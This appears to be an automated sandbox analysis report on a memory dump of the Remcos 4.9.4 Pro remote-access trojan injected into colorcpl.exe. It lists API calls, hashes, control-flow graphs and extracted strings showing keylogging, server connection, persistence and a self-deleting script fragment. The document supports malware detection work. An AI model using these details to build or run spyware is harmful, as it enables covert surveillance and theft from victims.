                                                                                                                              • Opcode ID: 5d10aabbd5b5b51d3b1a167b60107c5af56db5070779b7d339fa3a3ab4ddfdb3
                                                                                                                              • Instruction ID: 1b446ea334b46e4c70d90c7fe3c8ab03f9cd105559bad45cf0f8717b0e8ab983
                                                                                                                              • Opcode Fuzzy Hash: 5d10aabbd5b5b51d3b1a167b60107c5af56db5070779b7d339fa3a3ab4ddfdb3
                                                                                                                              • Instruction Fuzzy Hash: 3432E560F043446BFB18BB70DC65ABE26D99F82A4CF40082DE5439B2C1FE69FD058799
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 448 4674f2a-4674f72 call 46620df call 467b8b3 call 46620df call 4661e65 call 4661fab call 469baac 461 4674f74-4674f7b Sleep 448->461 462 4674f81-4674fcd call 4662093 call 4661e65 call 46620f6 call 467be1b call 466489e call 4661e65 call 466b9bd 448->462 461->462 477 4675041-46750dc call 4662093 call 4661e65 call 46620f6 call 467be1b call 4661e65 * 2 call 4666c1e call 4662f10 call 4661fe2 call 4661fd8 * 2 call 4661e65 call 4665b05 462->477 478 4674fcf-467503e call 4661e65 call 466247c call 4661e65 call 4661fab call 4661e65 call 466247c call 4661e65 call 4661fab call 4661e65 call 466247c call 4661e65 call 4661fab call 466473d 462->478 531 46750de-46750ea 477->531 532 46750ec-46750f3 477->532 478->477 533 46750f8-467518a call 4665aa6 call 466531e call 4666383 call 4662f10 call 4662093 call 467b4ef call 4661fd8 * 2 call 4661e65 call 4661fab call 4661e65 call 4661fab call 4674ee9 531->533 532->533 560 46751d5-46751e3 call 466482d 533->560 561 467518c-46751d0 WSAGetLastError call 467cae1 call 46652fd call 4662093 call 467b4ef call 4661fd8 533->561 566 46751e5-467520b call 4662093 * 2 call 467b4ef 560->566 567 4675210-4675225 call 4664f51 call 46648c8 560->567 582 4675aa3-4675ab5 call 4664e26 call 46621fa 561->582 566->582 567->582 583 467522b-467537e call 4661e65 * 2 call 466531e call 4666383 call 4662f10 call 4666383 call 4662f10 call 4662093 call 467b4ef call 4661fd8 * 4 call 467b7e0 call 46745bd call 466905c call 46a1e81 call 4661e65 call 46620f6 call 466247c call 4661fab * 2 call 46736f8 567->583 597 4675ab7-4675ad7 call 4661e65 call 4661fab call 469baac Sleep 582->597 598 4675add-4675ae5 call 4661e8d 582->598 648 4675392-46753b9 call 4661fab call 46735a6 583->648 649 4675380-467538d call 4665aa6 583->649 597->598 598->477 655 46753c0-4675a0a call 466417e call 466dd89 call 467bc42 call 467bd1e call 467bb8e call 4661e65 
GetTickCount call 467bb8e call 467bae6 call 467bb8e * 2 call 467ba96 call 467bd1e * 5 call 466f8d1 call 467bd1e call 4662f31 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 * 3 call 4662ea1 call 4662f10 call 4666383 call 4662f10 call 4666383 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 call 4666383 call 4662f10 * 5 call 4662ea1 call 4662f10 call 4662ea1 call 4662f10 * 7 call 4662ea1 call 4664aa1 call 4661fd8 * 50 call 4661f09 call 4661fd8 * 6 call 4661f09 call 4664c10 648->655 656 46753bb-46753bd 648->656 649->648 901 4675a0f-4675a16 655->901 656->655 902 4675a2a-4675a31 901->902 903 4675a18-4675a1f 901->903 905 4675a33-4675a38 call 466b051 902->905 906 4675a3d-4675a6f call 4665a6b call 4662093 * 2 call 467b4ef 902->906 903->902 904 4675a21-4675a23 903->904 904->902 905->906 917 4675a83-4675a9e call 4661fd8 * 2 call 4661f09 906->917 918 4675a71-4675a7d CreateThread 906->918 917->582 918->917
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNEL32(00000000,00000029,046D52F0,046D50E4,00000000), ref: 04674F7B
                                                                                                                              • WSAGetLastError.WS2_32(00000000,00000001), ref: 0467518C
                                                                                                                              • Sleep.KERNEL32(00000000,00000002), ref: 04675AD7
                                                                                                                                • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep$ErrorLastLocalTime
                                                                                                                              • String ID: | $%I64u$4.9.4 Pro$C:\Windows\SysWOW64\colorcpl.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$TLS Off$TLS On $hlight$name
                                                                                                                              • API String ID: 524882891-4164695623
                                                                                                                              • Opcode ID: 7f4cb071d50c5748074244e13730a8d760f2f9d9dd80ab1bc5ebfc1383e73498
                                                                                                                              • Instruction ID: 5cbb542297091afe36e7cb6c44b9bdc9daff0095f29c38e5f60638603ab31989
                                                                                                                              • Opcode Fuzzy Hash: 7f4cb071d50c5748074244e13730a8d760f2f9d9dd80ab1bc5ebfc1383e73498
                                                                                                                              • Instruction Fuzzy Hash: 2D524871E001185BEB18FB31EDA5AFEB3A59F51208F6045ADD40BA7194FF307E868E58
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0467D5DA
                                                                                                                              • GetCursorPos.USER32(?), ref: 0467D5E9
                                                                                                                              • SetForegroundWindow.USER32(?), ref: 0467D5F2
                                                                                                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0467D60C
                                                                                                                              • Shell_NotifyIconA.SHELL32(00000002,046D4B48), ref: 0467D65D
                                                                                                                              • ExitProcess.KERNEL32 ref: 0467D665
                                                                                                                              • CreatePopupMenu.USER32 ref: 0467D66B
                                                                                                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0467D680
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                              • String ID: Close
                                                                                                                              • API String ID: 1657328048-3535843008
                                                                                                                              • Opcode ID: f0d7cd0e4e33d531f39cd141e6bdc56415a88738747208261bcf36f09bf4c932
                                                                                                                              • Instruction ID: 0ea0785f50971b5e6056fbb673bcd58ebcf8da7367435c1ffb931cf1af3f040e
                                                                                                                              • Opcode Fuzzy Hash: f0d7cd0e4e33d531f39cd141e6bdc56415a88738747208261bcf36f09bf4c932
                                                                                                                              • Instruction Fuzzy Hash: 352148B1600208EFEB194FA4ED4EB693F75FF19341F001514F60AA11A0FB79ADA4EB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • connect.WS2_32(?,?,?), ref: 046648E0
                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0466530B,?,Keylogger initialization failure: error ,?,0466A30E,00000000), ref: 04664A00
                                                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0466530B,?,Keylogger initialization failure: error ,?,0466A30E,00000000), ref: 04664A0E
• WSAGetLastError.WS2_32(?,0466530B,?,Keylogger initialization failure: error ,?,0466A30E,00000000), ref: 04664A21
  • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: CreateEvent$ErrorLastLocalTimeconnect
• String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
• API String ID: 994465650-2151626615
• Opcode ID: 0d2b12d1838b1d8f75fe66e06ea844478a41fd83015ec53a71c610fba3ef7878
• Instruction ID: 2ce10be9f6c1c05b4dc350f7f0b84abc028627d1e72e34ed23a227f8834afd3a
• Opcode Fuzzy Hash: 0d2b12d1838b1d8f75fe66e06ea844478a41fd83015ec53a71c610fba3ef7878
• Instruction Fuzzy Hash: 2C412864B402067BF728BB79CC2A43DBB55EB51208B80025DD50707B49FE22B824CFEB
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 046B58A9: CreateFileW.KERNEL32(00000000,00000000,?,046B5C84,?,?,00000000,?,046B5C84,00000000,0000000C), ref: 046B58C6
• GetLastError.KERNEL32 ref: 046B5CEF
• __dosmaperr.LIBCMT ref: 046B5CF6
• GetFileType.KERNEL32(00000000), ref: 046B5D02
• GetLastError.KERNEL32 ref: 046B5D0C
• __dosmaperr.LIBCMT ref: 046B5D15
• CloseHandle.KERNEL32(00000000), ref: 046B5D35
• CloseHandle.KERNEL32(?), ref: 046B5E7F
• GetLastError.KERNEL32 ref: 046B5EB1
• __dosmaperr.LIBCMT ref: 046B5EB8
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: 49c57733bef8715d94be5a989a094574f54e5a6826ef444a78d7626bc1c011a0
• Instruction ID: add02b52d5ecb1afa3233718d3c51bf982667b7599f0f64eb4c8cec638076e6a
• Opcode Fuzzy Hash: 49c57733bef8715d94be5a989a094574f54e5a6826ef444a78d7626bc1c011a0
• Instruction Fuzzy Hash: B7A14632A14244AFDF199F68DC507EE3BA1EB06328F14015DE8529B3D0FB34AC96CB95
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• __Init_thread_footer.LIBCMT ref: 0466AD38
• Sleep.KERNEL32(000001F4), ref: 0466AD43
• GetForegroundWindow.USER32 ref: 0466AD49
• GetWindowTextLengthW.USER32(00000000), ref: 0466AD52
• GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0466AD86
• Sleep.KERNEL32(000003E8), ref: 0466AE54
  • Part of subcall function 0466A636: SetEvent.KERNEL32(?,?,00000000,0466B20A,00000000), ref: 0466A662
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Window$SleepText$EventForegroundInit_thread_footerLength
• String ID: [${ User has been idle for $ minutes }$]
• API String ID: 911427763-3954389425
• Opcode ID: 929d0a4f219145a97da8ea6690515e8a9225ceb3d1460ceb86870061d6e468fc
• Instruction ID: 2a8f11c8fa83e2ed56a384da58566745aa8fc05ca38039cf990cafba78dd30d9
• Opcode Fuzzy Hash: 929d0a4f219145a97da8ea6690515e8a9225ceb3d1460ceb86870061d6e468fc
• Instruction Fuzzy Hash: A051D3716083409BE714FB70D894ABEB7A5EF96708F40092DE447A2290FF74BD45C69A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0466DB9A
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: LongNamePath
• String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
• API String ID: 82841172-425784914
• Opcode ID: a6e8b3741f5b6ad5a7e37e8f8b5c3e62a11784f55a84e672a89b2b1365945db3
• Instruction ID: f0af7bb1961a53c675665869d897b14028d98315b2472d39ba09e19091cf50b2
• Opcode Fuzzy Hash: a6e8b3741f5b6ad5a7e37e8f8b5c3e62a11784f55a84e672a89b2b1365945db3
• Instruction Fuzzy Hash: 4B410371248201ABE714FA60DC65CFFB7E8AF91719F10051EB45792190FF70BE49CA9A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0467D476
  • Part of subcall function 0467D50F: RegisterClassExA.USER32(00000030), ref: 0467D55B
  • Part of subcall function 0467D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0467D576
  • Part of subcall function 0467D50F: GetLastError.KERNEL32 ref: 0467D580
• ExtractIconA.SHELL32(00000000,?,00000000), ref: 0467D4AD
• lstrcpynA.KERNEL32(046D4B60,Remcos,00000080), ref: 0467D4C7
• Shell_NotifyIconA.SHELL32(00000000,046D4B48), ref: 0467D4DD
• TranslateMessage.USER32(?), ref: 0467D4E9
• DispatchMessageA.USER32(?), ref: 0467D4F3
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0467D500
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
• String ID: Remcos
• API String ID: 1970332568-165870891
• Opcode ID: 1562d14e3249d66c63e03b22e5c03c33a72727c8b7450e49465057cc80478f39
• Instruction ID: f3bffb23e787a33bbf94782cf882dfea5320844ba4aa7c4888c7573331965b42
• Opcode Fuzzy Hash: 1562d14e3249d66c63e03b22e5c03c33a72727c8b7450e49465057cc80478f39
• Instruction Fuzzy Hash: 9E01FEB1941244ABD7109FA1EC4CFAABB7CEF95704F005019F65592190FA785C89CF90
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• AllocConsole.KERNEL32(046D5338), ref: 0467CDA4
• GetConsoleWindow.KERNEL32 ref: 0467CDAA
• ShowWindow.USER32(00000000,00000000), ref: 0467CDBD
• SetConsoleOutputCP.KERNEL32(000004E4), ref: 0467CDE2
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: Console$Window$AllocOutputShow
• String ID: Remcos v$4.9.4 Pro$CONOUT$
• API String ID: 4067487056-3065609815
• Opcode ID: 6297b85ac35a0e7aa2eb0794e2f9f07e5e113a1bc58af84b22d9c2da2090465e
• Instruction ID: 7fcbc76ed4588f72921cc481cbf8a403d13e56c694d4dc5eccc2b7d0d880f6fc
• Opcode Fuzzy Hash: 6297b85ac35a0e7aa2eb0794e2f9f07e5e113a1bc58af84b22d9c2da2090465e
• Instruction Fuzzy Hash: 380184B19803086BEB10FBF09C4EF9D77ACDF15B05F500419B619A7181FAB4BD148BA9
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 0467BFB7: GetCurrentProcess.KERNEL32(?,?,?,0466DAAA,WinDir,00000000,00000000), ref: 0467BFC8
  • Part of subcall function 046735A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 046735CA
  • Part of subcall function 046735A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 046735E7
  • Part of subcall function 046735A6: RegCloseKey.KERNEL32(?), ref: 046735F2
• StrToIntA.SHLWAPI(00000000,046CC9F8,00000000,00000000,00000000,046D50E4,00000003,Exe,00000000,0000000E,00000000,046C60BC,00000003,00000000), ref: 0467B33C
Strings
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: CloseCurrentOpenProcessQueryValue
• String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
• API String ID: 1866151309-2070987746
• Opcode ID: aed582f323855435f20150f4e420270d23191750d402484897a700460dcd3bc2
• Instruction ID: 36c18546fc31a83c3f664bb5516c360491ef29c484d3ecb39f36a143513f73c2
• Opcode Fuzzy Hash: aed582f323855435f20150f4e420270d23191750d402484897a700460dcd3bc2
• Instruction Fuzzy Hash: D9114870E012456BF704B778DC5AEBF7B58DB91A18F84012CE907A32D1FA647C86C7A9
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

APIs
• Sleep.KERNEL32(00001388), ref: 0466A740
  • Part of subcall function 0466A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0466A74D), ref: 0466A6AB
  • Part of subcall function 0466A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0466A74D), ref: 0466A6BA
  • Part of subcall function 0466A675: Sleep.KERNEL32(00002710,?,?,?,0466A74D), ref: 0466A6E7
  • Part of subcall function 0466A675: FindCloseChangeNotification.KERNEL32(00000000,?,?,?,0466A74D), ref: 0466A6EE
• CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0466A77C
• GetFileAttributesW.KERNEL32(00000000), ref: 0466A78D
• SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0466A7A4
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0466A81E
  • Part of subcall function 0467C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0466A843), ref: 0467C49E
• SetFileAttributesW.KERNEL32(00000000,00000006,00000013,046C6468,?,00000000,00000000,00000000,00000000,00000000), ref: 0466A927
Memory Dump Source
• Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
Yara matches
Similarity
• API ID: File$AttributesCreate$Sleep$ChangeCloseDirectoryExistsFindNotificationPathSize
• String ID:
• API String ID: 110482706-0
• Opcode ID: 69b1da187e4c42a5d7e5a708c8ad5fdf1344eebbe4e0fff10c1242155eaec694
• Instruction ID: 94d92f54c0d042251093d4d6eb5ed03a7ffbfe8669731901651542b80d25327e
                                                                                                                              • Opcode Fuzzy Hash: 69b1da187e4c42a5d7e5a708c8ad5fdf1344eebbe4e0fff10c1242155eaec694
                                                                                                                              • Instruction Fuzzy Hash: 29515C716043046BFB18BB70C864AFE77AA9F9220DF00491DE543A72D1FF34B9498799
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

APIs
• RegisterClassExA.USER32(00000030), ref: 0467D55B
• CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0467D576
• GetLastError.KERNEL32 ref: 0467D580
Similarity
• API ID: ClassCreateErrorLastRegisterWindow
• String ID: 0$MsgWindowClass
• API String ID: 2877667751-2410386613
• Opcode ID: b5ca1d0d5f1ba2b7df886572cbd5b8248ae763f0c390b6729d12715444c1b87d
• Instruction ID: 6657797363d50e4970ccb4db6b642c06593088e181e433ee2acf7c9fbfebf8b5
• Opcode Fuzzy Hash: b5ca1d0d5f1ba2b7df886572cbd5b8248ae763f0c390b6729d12715444c1b87d
• Instruction Fuzzy Hash: 5401E9B1D10219ABEB11DFD5DC849EFBBBCEF04294B40052AF915A6240E67559458AA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0467CDED), ref: 0467CD62
• GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0467CDED), ref: 0467CD6F
• SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0467CDED), ref: 0467CD7C
• SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0467CDED), ref: 0467CD8F
Strings
• ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0467CD82
Similarity
• API ID: Console$AttributeText$BufferHandleInfoScreen
• String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
• API String ID: 3024135584-2418719853
• Opcode ID: 33233148c39ea8cada8b6fe18625ba89ae247b56ad7a9adf49a62e31632784b4
• Instruction ID: 56c67cfc13b8eabdb19946c3b2cf070ae32d4704b383069049182b8ee4111c8b
• Opcode Fuzzy Hash: 33233148c39ea8cada8b6fe18625ba89ae247b56ad7a9adf49a62e31632784b4
• Instruction Fuzzy Hash: 22E048B2500305A7D3102BB5AC4DCAB7B6CE745712F101255FB1691281F9645885D6F1
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,046C6468,00000000,00000000,0466D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0467C430
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0467C44D
• CloseHandle.KERNEL32(00000000), ref: 0467C459
• WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0467C46A
• FindCloseChangeNotification.KERNEL32(00000000), ref: 0467C477
Similarity
• API ID: File$Close$ChangeCreateFindHandleNotificationPointerWrite
• String ID:
• API String ID: 1087594267-0
• Opcode ID: 89c99874900ce96746281414027c1b783a4a9dfe019f3a263a9733a0e8f869ca
• Instruction ID: aa54240a97ac087281978e1c554adef861fa85aecae6972b08541895579411b2
• Opcode Fuzzy Hash: 89c99874900ce96746281414027c1b783a4a9dfe019f3a263a9733a0e8f869ca
• Instruction Fuzzy Hash: EF11FEB13843147FEB144E24AC89FBB739CEB46774F104629F692D22CCF625AC459671
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateThread.KERNEL32(00000000,00000000,0466A27D,?,00000000,00000000), ref: 0466A1FE
• CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0466A20E
• CreateThread.KERNEL32(00000000,00000000,0466A289,?,00000000,00000000), ref: 0466A21A
  • Part of subcall function 0466B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0466B172
  • Part of subcall function 0466B164: wsprintfW.USER32 ref: 0466B1F3
Similarity
• API ID: CreateThread$LocalTimewsprintf
• String ID: Offline Keylogger Started
• API String ID: 465354869-4114347211
• Opcode ID: 834f6d2eac655fd0766b19ef002fba91b2785b452ca03f28c652dbfacbdd7b68
• Instruction ID: 6705a7a45d6b3e566e364657f0e304c9b9867dc3ef8ce15d7dc7e1db4c8c13c5
• Opcode Fuzzy Hash: 834f6d2eac655fd0766b19ef002fba91b2785b452ca03f28c652dbfacbdd7b68
• Instruction Fuzzy Hash: DC11CAB16002187FA320BB75DC95CBF7A5CDE8259CB40051DF54712145FA617D14CEF6
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetLocalTime.KERNEL32(00000001,046D4EE0,046D5598,?,?,?,?,04675CD6,?,00000001), ref: 04664F81
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,046D4EE0,046D5598,?,?,?,?,04675CD6,?,00000001), ref: 04664FCD
• CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 04664FE0
Strings
• KeepAlive | Enabled | Timeout: , xrefs: 04664F94
Similarity
• API ID: Create$EventLocalThreadTime
• String ID: KeepAlive | Enabled | Timeout:
• API String ID: 2532271599-1507639952
• Opcode ID: 06abae72f25b56d7881a531244b3f2dec8a81f4718bfcfd16719aa20d2a00598
• Instruction ID: d0b5c3c855e6c325b1930730337af0a1e6f288712176698522742d6543a1e0c9
• Opcode Fuzzy Hash: 06abae72f25b56d7881a531244b3f2dec8a81f4718bfcfd16719aa20d2a00598
• Instruction Fuzzy Hash: 5011A3719042847AE720AA76980DEAB7FA8DBD7714F04014EE54353244FAB4B445CBA6
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0467377E
• RegSetValueExA.KERNEL32(?,046C74B8,00000000,?,00000000,00000000,046D52F0,?,?,0466F853,046C74B8,4.9.4 Pro), ref: 046737A6
• RegCloseKey.ADVAPI32(?,?,?,0466F853,046C74B8,4.9.4 Pro), ref: 046737B1
Similarity
• API ID: CloseCreateValue
• String ID: pth_unenc
• API String ID: 1818849710-4028850238
• Opcode ID: d39b6c6e49843726d9a4cd3068790dfe1710cfb0d7b1e8cf13efa9431e1361e4
• Instruction ID: 78a3684d50dca713a13d3db33d9497ea3504ead5b8181445e9218afcc8f6a309
• Opcode Fuzzy Hash: d39b6c6e49843726d9a4cd3068790dfe1710cfb0d7b1e8cf13efa9431e1361e4
• Instruction Fuzzy Hash: C6F06DB2500118FBDB00AFA0DC45EEA3B7CEF05650F108258FE06A6250FB35AE58EB90
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,046D4F50), ref: 04664DB3
• CreateThread.KERNEL32(00000000,00000000,?,046D4EF8,00000000,00000000), ref: 04664DC7
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 04664DD2
• FindCloseChangeNotification.KERNEL32(?,?,00000000), ref: 04664DDB
Similarity
• API ID: Create$ChangeCloseEventFindNotificationObjectSingleThreadWait
• String ID:
• API String ID: 2579639479-0
• Opcode ID: 594039e39c0eb9f9cdd132cdc580df54091e31e6997f78c5ccbcef496ef24b98
• Instruction ID: bfbd51c031eafc1822e74e8fd09cbf95c944fcd23f02d3ad84fcb04c29f1ef11
• Opcode Fuzzy Hash: 594039e39c0eb9f9cdd132cdc580df54091e31e6997f78c5ccbcef496ef24b98
• Instruction Fuzzy Hash: B1415D71608345ABEB14BB61C954DBFB7E9AF95314F40091DF89382290FF34B9098A6A
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0466A74D), ref: 0466A6AB
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,0466A74D), ref: 0466A6BA
• Sleep.KERNEL32(00002710,?,?,?,0466A74D), ref: 0466A6E7
• FindCloseChangeNotification.KERNEL32(00000000,?,?,?,0466A74D), ref: 0466A6EE
Similarity
• API ID: File$ChangeCloseCreateFindNotificationSizeSleep
• String ID:
• API String ID: 4068920109-0
• Opcode ID: 99b92ef673309f2b0125254969fe8c888660c900ad547f0207e588a24f2517e3
• Instruction ID: 19de8a5399b88b163bdb14fad463aef8e45577df9980c89d085cf56188ca7564
• Opcode Fuzzy Hash: 99b92ef673309f2b0125254969fe8c888660c900ad547f0207e588a24f2517e3
• Instruction Fuzzy Hash: 7E115C70704340BEF731ABA49C98A2E3FAAFB47359F04140CE28396A81F664BC88C755
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • GetLocalTime.KERNEL32(?,046D5598,?,00000000,?,?,?,?,?,?,04675CC9,?,00000001,0000004C,00000000), ref: 04665030
                                                                                                                                • Part of subcall function 0467B4EF: GetLocalTime.KERNEL32(00000000), ref: 0467B509
                                                                                                                              • GetLocalTime.KERNEL32(?,046D5598,?,00000000,?,?,?,?,?,?,04675CC9,?,00000001,0000004C,00000000), ref: 04665087
                                                                                                                              Strings
                                                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 0466501F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, Offset: 04660000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_5_2_4660000_colorcpl.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LocalTime
                                                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                              • API String ID: 481472006-1507639952
                                                                                                                              • Opcode ID: 90986a6f2c5f6f5178688d8ebdf216328ae381331f909d661a098bd349d9cc0b
                                                                                                                              • Instruction ID: 79da333b2547766ef525c6a47d85cd7d2f2e6bb1a4e8d2e117ad661cd424f876
                                                                                                                              • Opcode Fuzzy Hash: 90986a6f2c5f6f5178688d8ebdf216328ae381331f909d661a098bd349d9cc0b
                                                                                                                              • Instruction Fuzzy Hash: 24210561E102807BE700FB34E816B7E7B98E755308F44151DD84707294FA3DBA4887E7
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
